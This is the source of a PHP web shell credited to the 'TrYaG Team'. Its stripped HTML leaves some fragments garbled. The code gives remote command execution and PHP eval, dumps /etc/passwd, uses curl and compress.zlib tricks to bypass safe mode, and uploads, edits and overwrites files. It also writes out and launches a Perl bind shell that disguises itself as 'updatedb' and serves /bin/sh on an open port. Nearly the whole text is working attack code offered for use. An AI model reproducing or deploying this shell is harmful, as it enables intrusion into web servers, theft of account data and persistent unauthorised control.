By * Super-Crystal * TrYaG Team ", 3,$ERORR); } // id // if ($_POST['plugin'] ){ switch($_POST['plugin']){ case("cat /etc/passwd"): for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print " "; } } break; } } // imap // $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { $stream = imap_open($string, "", ""); $str = imap_body($stream, 1); if (!empty($str)) echo " ".$str." "; imap_close($stream); } elseif ($string && $switch == "dir") { $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo " "; for ($i = 0; $i < count($dir_list); $i++) echo "$dir_list[$i]"."   " ; echo " "; imap_close($stream); } // CURL // if(empty($_POST['curl'])){ } else { $m=$_POST['curl']; $ch = curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); curl_exec($ch); var_dump(curl_exec($ch)); } // copy// $u1p=""; $tymczas=""; if(empty($_POST['copy'])){ } else { $u1p=$_POST['copy']; $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$u1p, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "".htmlspecialchars($tekst).""; unlink($temp); } else { die("Sorry... File ".htmlspecialchars($u1p)." dosen't exists or you don't have access."); } } @$dir = $_POST['dir']; $dir = stripslashes($dir); @$cmd = $_POST['cmd']; $cmd = stripslashes($cmd); $REQUEST_URI = $_SERVER['REQUEST_URI']; $dires = ''; $files = ''; if (isset($_POST['port'])){ $bind = " #!/usr/bin/perl \$port = {$_POST['port']}; \$port = \$ARGV[0] if \$ARGV[0]; exit if fork; $0 = \"updatedb\" . \" \" x100; \$SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X; } ";} function decode($buffer){ return convert_cyr_string ($buffer, 'd', 'w'); } function execute($com) { if (!empty($com)) { if(function_exists('exec')) { exec($com,$arr); echo implode(' ',$arr); } elseif(function_exists('shell_exec')) { echo shell_exec($com); } elseif(function_exists('system')) { echo system($com); } elseif(function_exists('passthru')) { echo passthru($com); } } } function perms($mode) { if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") { copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]); } if((isset($_POST['fileto']))||(isset($_POST['filefrom']))) { $data = implode("", file($_POST['filefrom'])); $fp = fopen($_POST['fileto'], "wb"); fputs($fp, $data); $ok = fclose($fp); if($ok) { $size = filesize($_POST['fileto'])/1024; $sizef = sprintf("%.2f", $size); print " Download - OK. (".$sizef."??) "; } else { print " Something is wrong. Download - IS NOT OK "; } } if (isset($_POST['installbind'])){ if (is_dir($_POST['installpath']) == true){ chdir($_POST['installpath']); $_POST['installpath'] = "temp.pl";} $fp = fopen($_POST['installpath'], "w"); fwrite($fp, $bind); fclose($fp); exec("perl " . $_POST['installpath']); chdir($dir); } @$ef = stripslashes($_POST['editfile']); if ($ef){ $fp = fopen($ef, "r"); $filearr = file($ef); $string = ''; $content = ''; foreach ($filearr as $string){ $string = str_replace("<" , "<" , $string); $string = str_replace(">" , ">" , $string); $content = $content . $string; } echo " Edit file: $ef $content "; fclose($fp); } if(isset($_POST['savefile'])){ $fp = fopen($_POST['savefile'], "w"); $content = stripslashes($content); fwrite($fp, $content); fclose($fp); echo " saved -OK! "; } if (isset($_POST['php'])){ echo " eval code "; } if(isset($_POST['phpcode'])){ echo " Results of PHP execution "; @eval(stripslashes($_POST['phpcode'])); echo " "; } if ($cmd){ if($sertype == "winda"){ ob_start(); execute($cmd); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } else{ ob_start(); echo decode(execute($cmd)); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } if (trim($buffer)){ echo " Command: $cmd "; echo decode($buffer); echo " "; } } $arr = array(); $arr = array_merge($arr, glob("*")); $arr = array_merge($arr, glob(".*")); $arr = array_merge($arr, glob("*.*")); $arr = array_unique($arr); sort($arr); echo ""; foreach ($arr as $filename) { if ($filename != "." and $filename != ".."){ if (is_dir($filename) == true){ $directory = ""; $directory = $directory . "";} else{ $directory = $directory . ""; } if (is_readable($filename) == true){ $directory = $directory . "";} else{ $directory = $directory . ""; } $dires = $dires . $directory; } if (is_file($filename) == true){ $file = ""; $file = $file . "";} else{ $file = $file . ""; } if (is_readable($filename) == true){ $file = $file . "";} else{ $file = $file . ""; } $files = $files . $file; } } } echo $dires; echo $files; echo " Name Type Size Last access Last change Perms Write Read $filename " . filetype($filename) . " " . date("G:i j M Y",fileatime($filename)) . " " . date("G:i j M Y",filemtime($filename)) . " " . perms(fileperms($filename)); if (is_writable($filename) == true){ $directory = $directory . " Yes No Yes No $filename " . filetype($filename) . " " . filesize($filename) . " " . date("G:i j M Y",fileatime($filename)) . " " . date("G:i j M Y",filemtime($filename)) . " " . perms(fileperms($filename)); if (is_writable($filename) == true){ $file = $file . " Yes No Yes No "; echo " Command: Directory: "; if (ini_get('safe_mode') == 1){echo " SAFE MOD IS ON Including from here: " . ini_get('safe_mode_include_dir') . " Exec here: " . ini_get('safe_mode_exec_dir'). "";} ?>